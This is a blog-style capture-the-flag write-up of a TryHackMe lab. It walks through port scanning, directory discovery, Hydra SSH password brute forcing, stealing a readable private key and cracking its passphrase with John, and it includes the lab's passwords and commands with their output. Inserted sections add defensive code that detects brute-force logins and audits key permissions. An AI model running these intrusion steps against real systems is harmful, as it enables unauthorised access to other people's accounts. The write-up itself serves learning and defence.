After my success in a previous TryHackMe room, I decided to have a go at another one.  This time it was a bit more difficult, and I have to admit, I needed to check the video at some stages to get some guidance.  Nevertheless, here is how I managed to complete the room.

Learning Objectives

The room was designed to give the user experience with the following tools and techniques:

  • brute forcing
  • hash cracking
  • service enumeration
  • Linux Enumeration

I didn't have much experience with hash cracking or brute forcing, so this was a good room for me to learn a bit about that.  I was familiar with the name of one of the tools I ended up using but hadn't used it in over a decade.

Questions

The list of challenges/questions for this room was as follows:

  1. Find the services exposed by the vulnerable machine
  2. What is the name of the hidden directory on the web server?
  3. Use brute-forcing to find the username and password
  4. What is the username?
  5. What is the password?
  6. What service do you use to access the server?
  7. Enumerate the machine to find any vectors for privilege escalation
  8. What is the name of the other user you found?
  9. If you have found another user, what can you do with this information?
  10. What is the final password you obtain?

Find the Services

The first thing I did was open up nmap and do a port scan on the server, asking it to retrieve the services and their versions, if possible.

┌──(gareth㉿SRF239-L)-[/usr/lib/win-kex/pulse]
└─$ nmap -sV 10.10.112.215
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-20 01:08 CET
Nmap scan report for 10.10.112.215
Host is up (0.042s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http        Apache httpd 2.4.18 ((Ubuntu))
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
8080/tcp open  http        Apache Tomcat 9.0.7
Service Info: Host: BASIC2; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Then I went to the website hosted on port 80 and was greeted with the following under construction page.

Nothing much to see here unfortunately

Although there was nothing to see here, because of the question I knew there was a hidden directory hosted on this server, so it was time to use dirbuster to scan for any hidden directories.

Find the Hidden Directory

┌──(gareth㉿SRF239-L)-[/usr/lib/win-kex/pulse]
└─$ dirb http://10.10.112.215

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sun Dec 20 01:12:05 2020
URL_BASE: http://10.10.112.215/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://10.10.112.215/ ----
==> DIRECTORY: http://10.10.112.215/development/
+ http://10.10.112.215/index.html (CODE:200|SIZE:158)
+ http://10.10.112.215/server-status (CODE:403|SIZE:301)

---- Entering directory: http://10.10.112.215/development/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
-----------------
END_TIME: Sun Dec 20 01:15:13 2020
DOWNLOADED: 4612 - FOUND: 2

Scanning the directory with dirbuster I was able to determine that the name of the hidden directory was in fact: development.

In this directory, there were 2 text files.

I wonder if there's anything interesting in here...

The contents of these files were as follows:

dev.txt

2018-04-23: I've been messing with that struts stuff, and it's pretty cool! I think it might be neat to host that on this server too. Haven't made any real web apps yet, but I have tried that example you get to show off how it works (and it's the REST version of the example!). Oh, and right now I'm using version 2.5.12, because other versions were giving me trouble. -K

2018-04-22: SMB has been configured. -K

2018-04-21: I got Apache set up. Will put in our content later. -J

j.txt

For J:

I've been auditing the contents of /etc/shadow to make sure we don't have any weak credentials, and I was able to crack your hash really easily. You know our password policy, so please follow it? Change that password ASAP.

-K

This led me off on a bit of a tangent, searching for vulnerabilities for Struts version 2.5.12 and the Tomcat server which was running on port 8080.  This ultimately ended up fruitless.

Finding the Usernames

Earlier on in one of the AdventOfCyber2 challenges, I was introduced to a script which could enumerate a Linux server and return a wealth of information about it.  I decided to try and run that script against the server instead.  This script is called enum4linux and comes preinstalled with Kali Linux.

The results of running this against the server revealed a lot of information, but perhaps the most important was the usernames of the J and K users.  A snippet from this script showed me the following:

┌──(gareth㉿SRF239-L)-[/usr/lib/win-kex/pulse]
└─$ enum4linux -a 10.10.81.129
...
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\kay (Local User)
S-1-22-1-1001 Unix User\jan (Local User)
...

So now I have the answers for questions 3, 4, 5 and 8.  But how to get the password for the user, and which user to try and crack?  Well, from the message that Kay so kindly left for Jan in the hidden development folder, we know that Jan has a weak password that should be easy to crack, so I decided to try that next.

Cracking the Password

From the port scan earlier I know that an SSH server is running on port 22, so I try and brute-force the ssh login.  I used a tool called hydra to do this.  I gave hydra the known username, "jan", and a list of passwords. Hydra will try all the passwords in the list and show me whenever there's a successful match.

┌──(gareth㉿SRF239-L)-[/usr/lib/win-kex/pulse]
└─$ hydra -l jan -P /usr/share/wordlists/rockyou.txt 10.10.81.129 ssh -f
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-12-20 23:13:04
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://10.10.81.129:22/
[STATUS] 181.00 tries/min, 181 tries in 00:01h, 14344223 to do in 1320:50h, 16 active
[STATUS] 130.67 tries/min, 392 tries in 00:03h, 14344009 to do in 1829:36h, 16 active
[ERROR] Can not create restore file (./hydra.restore) - Permission denied
[22][ssh] host: 10.10.81.129   login: jan   password: armando
[STATUS] attack finished for 10.10.81.129 (valid pair found)

So the answer to question 5, the password, is armando.
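
Seen from the server's side, the Hydra run above is a burst of failed password logins from one source followed by a success. The detection below is an added example, not part of the original write-up: the log lines are constructed in the usual sshd auth.log format, and the IP addresses, threshold and window are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

LINE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>\S+) port \d+")

def detect(lines, year=2020, threshold=10, window=timedelta(seconds=60)):
    """Alert when one source exceeds `threshold` failed password logins within
    `window`, and again if that source later logs in successfully."""
    recent = defaultdict(deque)  # source IP -> timestamps of recent failures
    flagged = set()              # sources that crossed the threshold
    alerts = []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        ip, user = m["ip"], m["user"]
        if m["result"] == "Accepted":
            if ip in flagged:
                alerts.append(("login_after_bruteforce", ip, user, ts))
            continue
        q = recent[ip]
        q.append(ts)
        while ts - q[0] > window:
            q.popleft()
        if len(q) >= threshold and ip not in flagged:
            flagged.add(ip)
            alerts.append(("bruteforce", ip, user, ts))
    return alerts

def sample_log():
    """Constructed auth.log lines: 12 failures 3 s apart, then a success."""
    t0 = datetime(2020, 12, 20, 23, 13, 5)
    fmt = "{:%b %d %H:%M:%S} basic2 sshd[{}]: {} password for {} from {} port {} ssh2"
    log = [fmt.format(t0 + timedelta(seconds=3 * i), 1200 + i, "Failed", "jan",
                      "198.51.100.7", 40000 + i) for i in range(12)]
    log.append(fmt.format(t0 + timedelta(seconds=45), 1300, "Accepted", "jan",
                          "198.51.100.7", 40100))
    log.append(fmt.format(t0 + timedelta(seconds=65), 1301, "Failed",
                          "invalid user admin", "192.0.2.44", 51000))
    log.append(fmt.format(t0 + timedelta(minutes=7), 1302, "Accepted", "kay",
                          "192.0.2.9", 51001))
    return log
```

The second alert type is the one that matters for incident response: it marks the account whose password was actually guessed. Setting PasswordAuthentication no in sshd_config removes this guessing surface entirely where key-based logins are already in use.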

Login with SSH

Perfect, now I have the password for the Jan user.  I can use this to log in via SSH.

┌──(gareth㉿SRF239-L)-[/usr/lib/win-kex/pulse]
└─$ ssh jan@10.10.81.129
jan@10.10.81.129's password: 
Last login: Sun Dec 20 17:33:33 2020 from 10.8.145.210
jan@basic2:~$

Enumerating the Linux Server

So now that I have SSH access to the server, it's time to run an enumeration script locally on the machine, to see if there are any avenues I can exploit.  I used a script called linpeas.sh that I found on GitHub.  LinPEAS gives a lovely colourful output of the various things it has found, with colour coding for severity, so it is easy to know what to try and exploit first.

┌──(gareth㉿SRF239-L)-[~/Desktop/Tools]
└─$ scp linpeas.sh jan@10.10.81.129:/tmp/linpeas.sh
jan@10.10.81.129's password: 
linpeas.sh

jan@basic2:~$ cd /tmp
jan@basic2:/tmp$ ls
hsperfdata_tomcat9
linpeas.sh
systemd-private-57d6d8ce909b4ab5881fd8dfb036a4b1-systemd-timesyncd.service-9s6Nq1
jan@basic2:/tmp$ chmod +x linpeas.sh 
jan@basic2:/tmp$ ./linpeas.sh

This script produced a lot of output.  The most interesting, however, was the availability of an ssh file for the other user on the system (kay).

[+] Searching ssl/ssh files
/home/kay/.ssh/authorized_keys                                                                                                                                                                                                             
/home/kay/.ssh/id_rsa
/home/kay/.ssh/id_rsa.pub
Port 22
PermitRootLogin prohibit-password
PubkeyAuthentication yes
PermitEmptyPasswords no
ChallengeResponseAuthentication no
UsePAM yes
Possible private SSH keys were found!
/home/kay/.ssh/id_rsa

Let's see if I can access this file, and if so, if I can use it to login as the Kay user.

jan@basic2:/tmp$ cat /home/kay/.ssh/id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,6ABA7DE35CDB65070B92C1F760E2FE75

.....
-----END RSA PRIVATE KEY-----
Wow, it was readable!

Remarkably, the file was readable by the Jan user, so I now have the private key.  I copied it to my local machine (using scp) and tried to log in as kay.

┌──(gareth㉿SRF239-L)-[~/.ssh]
└─$ ssh -i kay_id_rsa kay@10.10.81.129
Enter passphrase for key 'kay_id_rsa':
Nope, it's password protected

Cracking the SSH Key Password

So it looks like I need to try and crack this ssh file's password.  I can use a tool called John to try and do this.  To be able to use John though, I need to convert this ssh file into a format it understands.  Thankfully there's a script that comes with Kali Linux called ssh2john.py which will do just that.

Once I have the file in the format John understands, it's time to crack the password.  For this cracking attempt, as with the previous one, we'll be using a very large and famous wordlist called rockyou.txt.

┌──(gareth㉿SRF239-L)-[~/.ssh]
└─$ /usr/share/john/ssh2john.py kay_id_rsa > kay_id_rsa_john

┌──(gareth㉿SRF239-L)-[~/.ssh]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt kay_id_rsa_john 
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 8 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
beeswax          (kay_id_rsa)
Warning: Only 2 candidates left, minimum 8 needed for performance.
1g 0:00:00:07 DONE (2020-12-20 23:56) 0.1336g/s 1917Kp/s 1917Kc/s 1917KC/s a6_123..*7¡Vamos!
Session completed

It worked!!  I can now use the found password beeswax to add the ssh key and log in to the server as kay.

┌──(gareth㉿SRF239-L)-[~/.ssh]
└─$ ssh -i kay_id_rsa kay@10.10.81.129
Enter passphrase for key 'kay_id_rsa': 
Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.4.0-119-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

0 packages can be updated.
0 updates are security updates.


Last login: Mon Apr 23 16:04:07 2018 from 192.168.56.102
kay@basic2:~$
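
An added audit example (not part of the original write-up, nor of any tool used in it) for the two weaknesses this step relied on: a private key that another account could read, and the legacy "Proc-Type: 4,ENCRYPTED" PEM format, which John reported above as MD5-based with an iteration count of 1. The function names, finding strings and the files built in demo() are constructed for illustration.

```python
import base64, os, stat, tempfile

def key_format(text):
    """Classify private-key text by its PEM header and encryption fields."""
    lines = text.strip().splitlines()
    if not lines or "PRIVATE KEY-----" not in lines[0]:
        return None
    if "OPENSSH" in lines[0]:  # cipher name "none" after the magic = no passphrase
        blob = base64.b64decode("".join(lines[1:2])[:64])
        plain = blob.startswith(b"openssh-key-v1\0" + b"\x00\x00\x00\x04none")
        return "unencrypted" if plain else "openssh-encrypted"
    if any(l.startswith("Proc-Type: 4,ENCRYPTED") for l in lines[1:3]):
        return "legacy-pem"  # key derived by MD5 with no iteration stretching
    return "pkcs8-encrypted" if "ENCRYPTED" in lines[0] else "unencrypted"

def audit(root):
    """Map every private key under `root` to a list of findings."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for path in (os.path.join(dirpath, f) for f in files):
            try:
                mode = stat.S_IMODE(os.stat(path).st_mode)
                with open(path, errors="replace") as fh:
                    fmt = key_format(fh.read(65536))
            except (OSError, ValueError):
                continue  # unreadable by the auditing account, or not parseable
            if fmt is None:
                continue
            report[path] = found = []
            if mode & 0o077:
                found.append(f"mode {mode:04o}: other accounts can access the key")
            if fmt == "legacy-pem":
                found.append("legacy PEM encryption: offline guessing is cheap")
            elif fmt == "unencrypted":
                found.append("no passphrase")
    return report

def demo():
    """Audit two constructed files (placeholder bodies, not real keys)."""
    root = tempfile.mkdtemp()
    new = base64.b64encode(b"openssh-key-v1\0\x00\x00\x00\x0a" + b"aes256-ctr").decode()
    for name, mode, kind, body in (
            ("id_rsa", 0o644, "RSA", "Proc-Type: 4,ENCRYPTED\nDEK-Info: AES-128-CBC,00\n\nQ09O"),
            ("id_ed25519", 0o600, "OPENSSH", new)):
        path = os.path.join(root, name)
        with open(path, "w") as fh:
            fh.write(f"-----BEGIN {kind} PRIVATE KEY-----\n{body}\n-----END {kind} PRIVATE KEY-----\n")
        os.chmod(path, mode)
    return {os.path.basename(p): f for p, f in audit(root).items()}
```

Run as root against /home, audit() would list a key like kay's with both findings. Rewriting a flagged key with ssh-keygen -p -o -f <keyfile> stores it in the OpenSSH format, whose bcrypt KDF makes each passphrase guess far more expensive, and chmod 600 fixes the mode.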

Now it's time to find the password to answer the final question for the room.

Luckily in the home directory I found a file called pass.bak.  This file contains the final password:

kay@basic2:~$ ls
pass.bak
kay@basic2:~$ cat pass.bak
heresareallystrongpasswordthatfollowsthepasswordpolicy$$
kay@basic2:~$

Review

This room was a lot more difficult than the previous one.  There were several different tools involved and a few different potential avenues to explore.  

It taught me the importance of running enumeration scripts early to see if they can help solve problems automatically, without wasting time trying to find out things for myself in a more manual way.

It also opened up my eyes to how easy it is to run brute-force attacks against systems, and how to crack files offline as well.

I really enjoyed this room and hope I can find another similar one to try without having to resort to peeking at the video to make progress.